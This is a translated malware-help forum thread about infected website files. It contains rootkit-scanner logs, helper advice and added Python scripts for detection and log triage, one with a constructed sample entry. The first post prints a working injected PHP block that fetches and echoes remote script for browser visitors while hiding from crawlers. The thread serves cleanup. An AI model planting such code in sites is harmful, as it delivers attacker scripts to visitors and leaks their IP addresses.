C:\Users\k\AppData\Local\Temp\avgnt.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2015-03-25 00:08 ==================== End Of Log ============================ Code:
GMER 2.1.19357 - hxxp://www.gmer.net
Rootkit scan 2015-03-26 14:09:48
Windows 6.1.7601 Service Pack 1
\Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 INTEL_SSDSC2BW480A4 rev.DC32 447,13GB
Running: Gmer-19357.exe; Driver: C:\Users\k\AppData\Local\Temp\pxddqpoc.sys

---- System - GMER 2.1 ----

SSDT 86BD9554 ZwAssignProcessToJobObject
SSDT 86BDF0F4 ZwCreateKey
SSDT 86BD6BFC ZwCreateMutant
SSDT 86BD4064 ZwCreateProcess
SSDT 86BD3CF4 ZwCreateProcessEx
SSDT 8D853346 ZwCreateSection
SSDT 8D85331E ZwCreateSymbolicLinkObject
SSDT 86BDE0FC ZwCreateThread
SSDT 86BDE0C4 ZwCreateThreadEx
SSDT 86BD3CBC ZwCreateUserProcess
SSDT 86BD6A74 ZwDebugActiveProcess
SSDT 86BDEE7C ZwDeleteKey
SSDT 86BDEDD4 ZwDeleteValueKey
SSDT 86BD6B8C ZwDuplicateObject
SSDT 86BD6B1C ZwGetContextThread
SSDT 8D853323 ZwLoadDriver
SSDT 86BDED64 ZwMapViewOfSection
SSDT 86BD422C ZwOpenProcess
SSDT 8D853319 ZwOpenSection
SSDT 86BD41F4 ZwOpenThread
SSDT 86BD958C ZwProtectVirtualMemory
SSDT 86BDEE44 ZwRenameKey
SSDT 8D853350 ZwRequestWaitReplyPort
SSDT 86BDEE0C ZwRestoreKey
SSDT 86BD6AAC ZwResumeThread
SSDT 8D85334B ZwSetContextThread
SSDT 8D853355 ZwSetSecurityObject
SSDT 8D853328 ZwSetSystemInformation
SSDT 86BDF0BC ZwSetValueKey
SSDT 8D85335A ZwSystemDebugControl
SSDT 8D8532E7 ZwTerminateProcess
SSDT 86BD35AC ZwTerminateThread
SSDT 86BDE134 ZwWriteVirtualMemory

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!ZwRequestWaitReplyPort + 1495 82C8E9E5 1 Byte [06]
.text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 82CC8312 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}
.text ntkrnlpa.exe!KeRemoveQueueEx + 1153 82CCF5D8 4 Bytes [54, 95, BD, 86]
.text ntkrnlpa.exe!KeRemoveQueueEx + 11BF 82CCF644 4 Bytes [F4, F0, BD, 86]
.text ntkrnlpa.exe!KeRemoveQueueEx + 11CF 82CCF654 4 Bytes [FC, 6B, BD, 86]
.text ntkrnlpa.exe!KeRemoveQueueEx + 11E3 82CCF668 8 Bytes [64, 40, BD, 86, F4, 3C, BD, ...]
.text ntkrnlpa.exe!KeRemoveQueueEx + 11F7 82CCF67C 4 Bytes [46, 33, 85, 8D]
.text ...
? System32\drivers\souotvyr.sys The system cannot find the path specified. !

---- Devices - GMER 2.1 ----

Device Ntfs.sys
Device \Driver\kbdclass \Device\KeyboardClass0 86D52350
Device \Driver\kbdclass \Device\KeyboardClass1 86D52350
Device cdfs.sys

---- Processes - GMER 2.1 ----

Library C:\Program Files\Trend Micro\AMSP\module\1000001\3.5.1186\3.5.1186\utilJsonHandle.dll (*** hidden *** ) @ C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe [1844] 0x59480000

---- Registry - GMER 2.1 ----

Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System\Active
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System\Active@B97433AA 53

---- Disk sectors - GMER 2.1 ----

Disk \Device\Harddisk0\DR0 unknown MBR code

---- EOF - GMER 2.1 ----
Code:
<?php
#b617e0#
// Injected block; the #b617e0# ... #/b617e0# markers delimit it.
error_reporting(0);                  // silence all PHP errors so the injection never shows
@ini_set('display_errors', 0);
$wp_n4545 = @$_SERVER['HTTP_USER_AGENT'];
// Fire only for browser-like User-Agents (Gecko/MSIE) and never for anything
// containing "bot": crawlers and scanners get the clean page.
if ((preg_match('/Gecko|MSIE/i', $wp_n4545) && !preg_match('/bot/i', $wp_n4545))) {
    // Remote URL assembled from string fragments so the host name is not greppable
    // as one string; visitor IP, site host and User-Agent are sent along.
    $wp_n094545 = "hxxp://" . "theme" . "header" . ".com/" . "header" . "/?ip=" . $_SERVER['REMOTE_ADDR']
        . "&referer=" . urlencode($_SERVER['HTTP_HOST']) . "&ua=" . urlencode($wp_n4545);
    // Fetch with whatever the host permits: cURL, then file_get_contents
    // (needs allow_url_fopen), then fopen + stream_get_contents.
    if (function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $wp_n094545);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $wp_4545n = curl_exec($ch);
        curl_close($ch);
    } elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {
        $wp_4545n = @file_get_contents($wp_n094545);
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $wp_4545n = @stream_get_contents(@fopen($wp_n094545, "r"));
    }
}
// Output the response only if characters 1-3 are "scr", i.e. it starts with a
// <script ...> tag; the remote server decides per visitor what gets injected.
if (substr($wp_4545n, 1, 3) === 'scr') {
    echo $wp_4545n;
}
#/b617e0#
?>
Last edited by stefan87 (26.03.2015 at 14:58) |
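The injected block above is a User-Agent-gated remote include: it fires only for visitors whose User-Agent looks like a Firefox or Internet Explorer browser and not like a crawler, fetches a URL assembled from string fragments, and echoes the response if it begins with a script tag. The Python script below is an added example, not code from this thread, that walks a web root, flags .php files carrying the #xxxxxx#...#/xxxxxx# marker pair or at least three of the behavioural indicators seen in the sample, optionally restricts itself to files modified after a given time (the window Stefan describes), and strips the marked block. The sample files it scans are constructed inline; the generic marker pattern, the indicator list and the one-hour window are assumptions chosen for illustration. Cleaning the files does not close the path that was used to write them; the FTP credentials still need changing and the server-side login records still need checking.

```python
"""Find and strip the user-agent-gated PHP injection seen in this thread.

Added example, not code from the thread. Marker pair and indicator strings
come from the posted sample; everything under "constructed samples" is made up.
"""
import os
import re
import tempfile
from datetime import datetime, timedelta
from typing import Iterator, Optional, Tuple

# The posted sample wraps itself in "#b617e0# ... #/b617e0#". The hex tag differs
# between campaigns, so accept any 6-hex tag as long as both ends carry the same one.
MARKER_BLOCK = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.S)

# Behavioural indicators from the sample, for copies that lost their markers:
# silenced errors, browser-only gating on the User-Agent, and a remote fetch.
INDICATORS = [
    re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    re.compile(r"preg_match\s*\(\s*['\"]/Gecko\|MSIE/i['\"]"),
    re.compile(r"\$_SERVER\['HTTP_USER_AGENT'\]"),
    re.compile(r"curl_init\s*\(|file_get_contents\s*\(|stream_get_contents\s*\("),
]


def classify(src: str) -> str:
    """'marker' if the delimited block is present, 'heuristic' if >= 3 indicators, else 'clean'."""
    if MARKER_BLOCK.search(src):
        return "marker"
    if sum(1 for p in INDICATORS if p.search(src)) >= 3:
        return "heuristic"
    return "clean"


def strip_injection(src: str) -> str:
    """Remove every marked block and the empty '<?php ?>' shell the removal leaves behind."""
    cleaned = MARKER_BLOCK.sub("", src)
    return re.sub(r"<\?php\s*\?>\s*", "", cleaned)


def scan_tree(root: str, since: Optional[datetime] = None) -> Iterator[Tuple[str, str, datetime]]:
    """Yield (path, verdict, mtime) for every .php file, optionally only those modified after `since`."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            mtime = datetime.fromtimestamp(os.path.getmtime(path))
            if since is not None and mtime < since:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                yield path, classify(fh.read()), mtime


# --- constructed samples (not taken from a real server) ---
INJECTED = (
    "<?php #b617e0# error_reporting(0); @ini_set('display_errors',0); "
    "$wp_n4545 = @$_SERVER['HTTP_USER_AGENT']; "
    "if (( preg_match ('/Gecko|MSIE/i', $wp_n4545) && !preg_match ('/bot/i', $wp_n4545))){ "
    "/* remote fetch elided in this constructed sample */ } #/b617e0# ?>"
)
ORIGINAL = "<?php\n// constructed stand-in for the site's own index.php\necho 'hello';\n"


def demo_scan() -> dict:
    """Write the samples into a temp dir, scan it for the last hour, return {file: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
            fh.write(INJECTED + ORIGINAL)          # infected copy
        with open(os.path.join(root, "config.php"), "w", encoding="utf-8") as fh:
            fh.write(ORIGINAL)                     # untouched file
        with open(os.path.join(root, "style.css"), "w", encoding="utf-8") as fh:
            fh.write("body {}")                    # non-PHP, must be skipped
        since = datetime.now() - timedelta(hours=1)
        return {os.path.basename(p): v for p, v, _ in scan_tree(root, since)}


if __name__ == "__main__":
    for name, verdict in demo_scan().items():
        print(f"{verdict:10s} {name}")
    print("cleaned index.php equals original:", strip_injection(INJECTED + ORIGINAL) == ORIGINAL)
```

On a real web root, call `scan_tree("/var/www", since=...)` with the start of the suspicious window and review the `heuristic` hits by hand before running `strip_injection` over the `marker` hits; keep a copy of every file before rewriting it.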
26.03.2015, 14:51 | #2 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP files manipulated Hi,
Please always post logs directly in the thread. If necessary, split them up and use several posts. I cannot open attachments at work, thanks. This is how it works: Posting in CODE tags. Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive beforehand, makes my work massively harder, unless of course the file would otherwise be too large for the forum. To put the log files into a CODE box, proceed as follows:
|
26.03.2015, 15:00 | #3 |
| FTPs Flash FXP files manipulated Hello Schrauber,
OK, I've pasted them in above. Only the Wireshark one doesn't work. The possibly malicious IP is: 178.237.24.191 hxxp://www.utrace.de/?query=178.237.24.191 Regards, Stefan |
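With the logs now in the thread, the FRST listings in the first post run to thousands of entries, and the useful step is reducing them to what needs a human look: executables with no company string in their version info, executables sitting in user-writable locations such as Temp or AppData, and anything that changed in the window around the incident. The Python below is an added example, not code from this thread or from FRST, that parses FRST's `date - date - size attrs (company) path` lines and applies those three checks. Four sample lines are copied from the listing above, plus one constructed Temp\update_3f9a.exe entry that does not exist on the poster's machine; the 48-hour window and the reference time (the first post's timestamp) are assumptions. An empty company string only means FRST found no company in the file's version resource; it is not a signature check (FRST does those separately, as the "File is digitally signed" lines in the Bamital & volsnap section show).

```python
"""Triage FRST's one-month file listings for entries worth a second look.

Added example, not code from the thread or from FRST. The line format
(date - date - size attrs (company) path) is read off the listing posted above.
"""
import os
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple

FRST_LINE = re.compile(
    r"^(?P<first>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<second>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d{8}) (?P<attrs>[_A-Z]{5}) \((?P<company>[^)]*)\) (?P<path>.+)$"
)
EXEC_EXT = (".exe", ".dll", ".sys", ".cpl", ".ocx", ".scr")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


@dataclass
class Entry:
    first: datetime      # the date column the section is sorted on
    second: datetime
    size: int
    attrs: str           # e.g. ____D directory, ____H hidden, ___SD system + directory
    company: str         # company string from the file's version info, often empty
    path: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.attrs


def parse_frst(text: str) -> List[Entry]:
    """Parse every line matching the FRST entry format; other lines are ignored."""
    out = []
    for line in text.splitlines():
        m = FRST_LINE.match(line.strip())
        if not m:
            continue
        out.append(Entry(
            first=datetime.strptime(m["first"], "%Y-%m-%d %H:%M"),
            second=datetime.strptime(m["second"], "%Y-%m-%d %H:%M"),
            size=int(m["size"]),
            attrs=m["attrs"],
            company=m["company"].strip(),
            path=m["path"].strip(),
        ))
    return out


def triage(entries: List[Entry], now: datetime,
           recent: timedelta = timedelta(hours=48)) -> List[Tuple[str, List[str]]]:
    """Return (path, reasons) for executable files that deserve a closer look."""
    flagged = []
    for e in entries:
        if e.is_dir or os.path.splitext(e.path)[1].lower() not in EXEC_EXT:
            continue
        reasons = []
        if not e.company:
            reasons.append("no company string in version info")
        if any(tok in e.path.lower() for tok in USER_WRITABLE):
            reasons.append("executable under a user-writable path")
        if now - e.first <= recent:
            reasons.append(f"changed within the last {int(recent.total_seconds() // 3600)} h")
        if reasons:
            flagged.append((e.path, reasons))
    return flagged


# Four lines copied from the listing in this thread plus one CONSTRUCTED entry
# (the Temp\update_3f9a.exe line) that does not exist on the poster's machine.
SAMPLE_LOG = r"""
2015-03-14 16:03 - 2015-03-16 15:45 - 00000000 ____D () C:\Users\k\AppData\Roaming\TeamViewer
2015-03-10 21:55 - 2015-02-24 03:32 - 00342696 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-03-21 12:23 - 2014-12-12 14:24 - 00778928 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-03-26 12:34 - 2009-07-14 05:34 - 00021856 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-03-25 13:02 - 2015-03-25 13:02 - 00045056 _____ () C:\Users\k\AppData\Local\Temp\update_3f9a.exe
"""
POST_TIME = datetime(2015, 3, 26, 14, 38)   # timestamp of the first post, used as "now"


def demo() -> List[Tuple[str, List[str]]]:
    return triage(parse_frst(SAMPLE_LOG), POST_TIME)


if __name__ == "__main__":
    for path, reasons in demo():
        print(path)
        for r in reasons:
            print("   -", r)
```

Feed the whole FRST.txt to `parse_frst` and the log's own scan time to `triage`; the Microsoft-signed system32 entries from a Patch Tuesday drop out immediately, and what remains is short enough to check by hash or signature.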
26.03.2015, 19:33 | #4 |
/// the machine /// TB-Ausbilder | FTPs Flash FXP files manipulated Hi, please download Malwarebytes Anti-Rootkit and save it to your desktop.
Do not start any other file in this folder without instructions from a helper. Please download TDSSKiller.exe and save this file to the desktop.
Regards, schrauber. Proud Member of UNITE and ASAP since 2009. Donations, Guides and help, Trojaner-Board Facebook page. No help via PM! |
27.03.2015, 14:29 | #5 |
| FTPs Flash FXP files manipulated Both look fine so far, nothing found. Or bad, because I still don't know what it was or is. Code:
Malwarebytes Anti-Rootkit BETA 1.09.1.1004
www.malwarebytes.org

Database version:
  main:    v2015.03.27.05
  rootkit: v2015.03.26.01

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.17691
k :: K-PC [administrator]

27.03.2015 13:34:45
mbar-log-2015-03-27 (13-34-45).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 319685
Time elapsed: 7 minute(s), 57 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
14:17:22.0566 0x0af0 TDSS rootkit removing tool 3.0.0.44 Jan 22 2015 08:27:04
14:17:29.0477 0x0af0 ============================================================
14:17:29.0477 0x0af0 Current date / time: 2015/03/27 14:17:29.0477
14:17:29.0477 0x0af0 SystemInfo:
14:17:29.0477 0x0af0
14:17:29.0477 0x0af0 OS Version: 6.1.7601 ServicePack: 1.0
14:17:29.0477 0x0af0 Product type: Workstation
14:17:29.0477 0x0af0 ComputerName: K-PC
14:17:29.0477 0x0af0 UserName: k
14:17:29.0477 0x0af0 Windows directory: C:\Windows
14:17:29.0477 0x0af0 System windows directory: C:\Windows
14:17:29.0477 0x0af0 Processor architecture: Intel x86
14:17:29.0477 0x0af0 Number of processors: 4
14:17:29.0477 0x0af0 Page size: 0x1000
14:17:29.0477 0x0af0 Boot type: Normal boot
14:17:29.0477 0x0af0 ============================================================
14:17:31.0327 0x0af0 KLMD registered as C:\Windows\system32\drivers\60449279.sys
14:17:31.0737 0x0af0 System UUID: {785D16FD-329A-E977-56C8-831842E24307}
14:17:32.0787 0x0af0 Drive \Device\Harddisk0\DR0 - Size: 0x6FC86D6000 ( 447.13 Gb ), SectorSize: 0x200, Cylinders: 0x35CA4, SectorsPerTrack: 0x13, TracksPerCylinder: 0xE0, Type 'K0', Flags 0x00000050
14:17:32.0787 0x0af0 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
14:17:32.0797 0x0af0 ============================================================
14:17:32.0797 0x0af0 \Device\Harddisk0\DR0:
14:17:32.0797 0x0af0 MBR partitions:
14:17:32.0797 0x0af0 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
14:17:32.0797 0x0af0 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x37E10000
14:17:32.0797 0x0af0 \Device\Harddisk1\DR1:
14:17:32.0797 0x0af0 MBR partitions:
14:17:32.0797 0x0af0 \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
14:17:32.0797 0x0af0
============================================================ 14:17:32.0817 0x0af0 Initialize success 14:17:32.0817 0x0af0 ============================================================ 14:17:39.0107 0x1220 ============================================================ 14:17:39.0107 0x1220 Scan started 14:17:39.0107 0x1220 Mode: Manual; 14:17:39.0107 0x1220 ============================================================ 14:17:39.0107 0x1220 KSN ping started 14:17:52.0548 0x1220 KSN ping finished: true 14:17:52.0768 0x1220 ================ Scan system memory ======================== 14:17:52.0768 0x1220 System memory - ok 14:17:52.0768 0x1220 ================ Scan services ============================= 14:17:52.0788 0x1220 1394ohci - ok 14:17:52.0788 0x1220 ACPI - ok 14:17:52.0798 0x1220 AcpiPmi - ok 14:17:52.0798 0x1220 Adobe LM Service - ok 14:17:52.0808 0x1220 AdobeARMservice - ok 14:17:52.0818 0x1220 AdobeFlashPlayerUpdateSvc - ok 14:17:52.0828 0x1220 adp94xx - ok 14:17:52.0828 0x1220 adpahci - ok 14:17:52.0838 0x1220 adpu320 - ok 14:17:52.0838 0x1220 AeLookupSvc - ok 14:17:52.0848 0x1220 AFD - ok 14:17:52.0848 0x1220 agp440 - ok 14:17:52.0858 0x1220 aic78xx - ok 14:17:52.0858 0x1220 ALG - ok 14:17:52.0868 0x1220 aliide - ok 14:17:52.0868 0x1220 amdagp - ok 14:17:52.0878 0x1220 amdide - ok 14:17:52.0888 0x1220 AmdK8 - ok 14:17:52.0888 0x1220 AmdPPM - ok 14:17:52.0898 0x1220 amdsata - ok 14:17:52.0898 0x1220 amdsbs - ok 14:17:52.0908 0x1220 amdxata - ok 14:17:52.0908 0x1220 Amsp - ok 14:17:52.0918 0x1220 AntiVirSchedulerService - ok 14:17:52.0918 0x1220 AntiVirService - ok 14:17:52.0928 0x1220 AppID - ok 14:17:52.0928 0x1220 AppIDSvc - ok 14:17:52.0938 0x1220 Appinfo - ok 14:17:52.0938 0x1220 Apple Mobile Device - ok 14:17:52.0948 0x1220 arc - ok 14:17:52.0948 0x1220 arcsas - ok 14:17:52.0958 0x1220 aspnet_state - ok 14:17:52.0968 0x1220 AsyncMac - ok 14:17:52.0978 0x1220 atapi - ok 14:17:52.0978 0x1220 AudioEndpointBuilder - ok 14:17:52.0988 0x1220 Audiosrv - ok 
14:17:52.0988 0x1220 avgntflt - ok 14:17:52.0998 0x1220 avipbb - ok 14:17:52.0998 0x1220 Avira.OE.ServiceHost - ok 14:17:53.0008 0x1220 avkmgr - ok 14:17:53.0008 0x1220 AxInstSV - ok 14:17:53.0018 0x1220 b06bdrv - ok 14:17:53.0018 0x1220 b57nd60x - ok 14:17:53.0028 0x1220 BDESVC - ok 14:17:53.0028 0x1220 Beep - ok 14:17:53.0038 0x1220 BFE - ok 14:17:53.0038 0x1220 BITS - ok 14:17:53.0048 0x1220 blbdrive - ok 14:17:53.0048 0x1220 Bonjour Service - ok 14:17:53.0058 0x1220 bowser - ok 14:17:53.0058 0x1220 BrFiltLo - ok 14:17:53.0068 0x1220 BrFiltUp - ok 14:17:53.0068 0x1220 Browser - ok 14:17:53.0078 0x1220 Brserid - ok 14:17:53.0078 0x1220 BrSerWdm - ok 14:17:53.0088 0x1220 BrUsbMdm - ok 14:17:53.0088 0x1220 BrUsbSer - ok 14:17:53.0098 0x1220 BTHMODEM - ok 14:17:53.0108 0x1220 bthserv - ok 14:17:53.0108 0x1220 cdfs - ok 14:17:53.0118 0x1220 cdrom - ok 14:17:53.0118 0x1220 CertPropSvc - ok 14:17:53.0128 0x1220 circlass - ok 14:17:53.0128 0x1220 CLCapSvc - ok 14:17:53.0138 0x1220 CLFS - ok 14:17:53.0138 0x1220 clr_optimization_v2.0.50727_32 - ok 14:17:53.0148 0x1220 clr_optimization_v4.0.30319_32 - ok 14:17:53.0158 0x1220 CLSched - ok 14:17:53.0158 0x1220 CmBatt - ok 14:17:53.0158 0x1220 cmdide - ok 14:17:53.0168 0x1220 CNG - ok 14:17:53.0168 0x1220 Compbatt - ok 14:17:53.0178 0x1220 CompositeBus - ok 14:17:53.0178 0x1220 COMSysApp - ok 14:17:53.0188 0x1220 crcdisk - ok 14:17:53.0198 0x1220 CryptSvc - ok 14:17:53.0198 0x1220 CXAVSAUD - ok 14:17:53.0208 0x1220 DcomLaunch - ok 14:17:53.0208 0x1220 defragsvc - ok 14:17:53.0218 0x1220 DfsC - ok 14:17:53.0218 0x1220 Dhcp - ok 14:17:53.0228 0x1220 discache - ok 14:17:53.0228 0x1220 Disk - ok 14:17:53.0238 0x1220 Dnscache - ok 14:17:53.0238 0x1220 dot3svc - ok 14:17:53.0248 0x1220 DPS - ok 14:17:53.0248 0x1220 drmkaud - ok 14:17:53.0258 0x1220 DXGKrnl - ok 14:17:53.0258 0x1220 EapHost - ok 14:17:53.0268 0x1220 ebdrv - ok 14:17:53.0268 0x1220 EFS - ok 14:17:53.0278 0x1220 ehRecvr - ok 14:17:53.0278 0x1220 ehSched - ok 
14:17:53.0288 0x1220 elxstor - ok 14:17:53.0288 0x1220 ErrDev - ok 14:17:53.0298 0x1220 EventSystem - ok 14:17:53.0308 0x1220 exfat - ok 14:17:53.0308 0x1220 fastfat - ok 14:17:53.0318 0x1220 Fax - ok 14:17:53.0318 0x1220 fdc - ok 14:17:53.0328 0x1220 fdPHost - ok 14:17:53.0328 0x1220 FDResPub - ok 14:17:53.0338 0x1220 FileInfo - ok 14:17:53.0338 0x1220 Filetrace - ok 14:17:53.0348 0x1220 flpydisk - ok 14:17:53.0348 0x1220 FltMgr - ok 14:17:53.0358 0x1220 FontCache - ok 14:17:53.0358 0x1220 FontCache3.0.0.0 - ok 14:17:53.0368 0x1220 FsDepends - ok 14:17:53.0368 0x1220 Fs_Rec - ok 14:17:53.0378 0x1220 fvevol - ok 14:17:53.0378 0x1220 gagp30kx - ok 14:17:53.0388 0x1220 GEARAspiWDM - ok 14:17:53.0388 0x1220 gpsvc - ok 14:17:53.0398 0x1220 gupdate - ok 14:17:53.0398 0x1220 gupdatem - ok 14:17:53.0408 0x1220 HauppaugeTVServer - ok 14:17:53.0408 0x1220 hcw85cir - ok 14:17:53.0418 0x1220 hcw88bda - ok 14:17:53.0418 0x1220 hcw88rc5 - ok 14:17:53.0428 0x1220 HCW88TSE - ok 14:17:53.0428 0x1220 hcw88vid - ok 14:17:53.0438 0x1220 HdAudAddService - ok 14:17:53.0448 0x1220 HDAudBus - ok 14:17:53.0448 0x1220 HidBatt - ok 14:17:53.0458 0x1220 HidBth - ok 14:17:53.0458 0x1220 HidIr - ok 14:17:53.0468 0x1220 hidserv - ok 14:17:53.0468 0x1220 HidUsb - ok 14:17:53.0478 0x1220 hkmsvc - ok 14:17:53.0478 0x1220 HomeGroupListener - ok 14:17:53.0488 0x1220 HomeGroupProvider - ok 14:17:53.0488 0x1220 HpSAMD - ok 14:17:53.0498 0x1220 HTTP - ok 14:17:53.0498 0x1220 hwpolicy - ok 14:17:53.0508 0x1220 i8042prt - ok 14:17:53.0508 0x1220 iaStorV - ok 14:17:53.0518 0x1220 idsvc - ok 14:17:53.0528 0x1220 IEEtwCollectorService - ok 14:17:53.0528 0x1220 iirsp - ok 14:17:53.0538 0x1220 IKEEXT - ok 14:17:53.0538 0x1220 IntcAzAudAddService - ok 14:17:53.0548 0x1220 intelide - ok 14:17:53.0548 0x1220 intelppm - ok 14:17:53.0558 0x1220 IPBusEnum - ok 14:17:53.0558 0x1220 IpFilterDriver - ok 14:17:53.0568 0x1220 iphlpsvc - ok 14:17:53.0568 0x1220 IPMIDRV - ok 14:17:53.0578 0x1220 IPNAT - ok 14:17:53.0578 
0x1220 iPod Service - ok 14:17:53.0588 0x1220 IRENUM - ok 14:17:53.0588 0x1220 isapnp - ok 14:17:53.0598 0x1220 iScsiPrt - ok 14:17:53.0598 0x1220 kbdclass - ok 14:17:53.0608 0x1220 kbdhid - ok 14:17:53.0608 0x1220 KeyIso - ok 14:17:53.0618 0x1220 KSecDD - ok 14:17:53.0618 0x1220 KSecPkg - ok 14:17:53.0628 0x1220 KtmRm - ok 14:17:53.0628 0x1220 L1E - ok 14:17:53.0638 0x1220 LanmanServer - ok 14:17:53.0638 0x1220 LanmanWorkstation - ok 14:17:53.0648 0x1220 lltdio - ok 14:17:53.0658 0x1220 lltdsvc - ok 14:17:53.0658 0x1220 lmhosts - ok 14:17:53.0668 0x1220 LSI_FC - ok 14:17:53.0668 0x1220 LSI_SAS - ok 14:17:53.0678 0x1220 LSI_SAS2 - ok 14:17:53.0678 0x1220 LSI_SCSI - ok 14:17:53.0688 0x1220 luafv - ok 14:17:53.0698 0x1220 MBAMProtector - ok 14:17:53.0698 0x1220 MBAMScheduler - ok 14:17:53.0708 0x1220 MBAMService - ok 14:17:53.0708 0x1220 MBAMSwissArmy - ok 14:17:53.0718 0x1220 MBAMWebAccessControl - ok 14:17:53.0718 0x1220 Mcx2Svc - ok 14:17:53.0728 0x1220 megasas - ok 14:17:53.0728 0x1220 MegaSR - ok 14:17:53.0738 0x1220 MMCSS - ok 14:17:53.0738 0x1220 Modem - ok 14:17:53.0748 0x1220 monitor - ok 14:17:53.0748 0x1220 mouclass - ok 14:17:53.0758 0x1220 mouhid - ok 14:17:53.0758 0x1220 mountmgr - ok 14:17:53.0768 0x1220 MozillaMaintenance - ok 14:17:53.0768 0x1220 mpio - ok 14:17:53.0778 0x1220 mpsdrv - ok 14:17:53.0778 0x1220 MpsSvc - ok 14:17:53.0788 0x1220 MRxDAV - ok 14:17:53.0788 0x1220 mrxsmb - ok 14:17:53.0798 0x1220 mrxsmb10 - ok 14:17:53.0798 0x1220 mrxsmb20 - ok 14:17:53.0808 0x1220 msahci - ok 14:17:53.0808 0x1220 msdsm - ok 14:17:53.0818 0x1220 MSDTC - ok 14:17:53.0828 0x1220 Msfs - ok 14:17:53.0828 0x1220 mshidkmdf - ok 14:17:53.0838 0x1220 msisadrv - ok 14:17:53.0838 0x1220 MSiSCSI - ok 14:17:53.0848 0x1220 msiserver - ok 14:17:53.0848 0x1220 MSKSSRV - ok 14:17:53.0858 0x1220 MSPCLOCK - ok 14:17:53.0858 0x1220 MSPQM - ok 14:17:53.0868 0x1220 MsRPC - ok 14:17:53.0878 0x1220 mssmbios - ok 14:17:53.0878 0x1220 MSTEE - ok 14:17:53.0888 0x1220 MTConfig - ok 
14:17:53.0888 0x1220 MTsensor - ok 14:17:53.0898 0x1220 Mup - ok 14:17:53.0898 0x1220 napagent - ok 14:17:53.0908 0x1220 NativeWifiP - ok 14:17:53.0908 0x1220 NDIS - ok 14:17:53.0918 0x1220 NdisCap - ok 14:17:53.0918 0x1220 NdisTapi - ok 14:17:53.0928 0x1220 Ndisuio - ok 14:17:53.0928 0x1220 NdisWan - ok 14:17:53.0938 0x1220 NDProxy - ok 14:17:53.0938 0x1220 NetBIOS - ok 14:17:53.0948 0x1220 NetBT - ok 14:17:53.0948 0x1220 Netlogon - ok 14:17:53.0948 0x1220 Netman - ok 14:17:53.0958 0x1220 NetMsmqActivator - ok 14:17:53.0968 0x1220 NetPipeActivator - ok 14:17:53.0968 0x1220 netprofm - ok 14:17:53.0978 0x1220 NetTcpActivator - ok 14:17:53.0978 0x1220 NetTcpPortSharing - ok 14:17:53.0988 0x1220 nfrd960 - ok 14:17:53.0988 0x1220 NlaSvc - ok 14:17:53.0998 0x1220 NPF - ok 14:17:53.0998 0x1220 Npfs - ok 14:17:54.0008 0x1220 nsi - ok 14:17:54.0008 0x1220 nsiproxy - ok 14:17:54.0018 0x1220 Ntfs - ok 14:17:54.0018 0x1220 Null - ok 14:17:54.0028 0x1220 nvlddmkm - ok 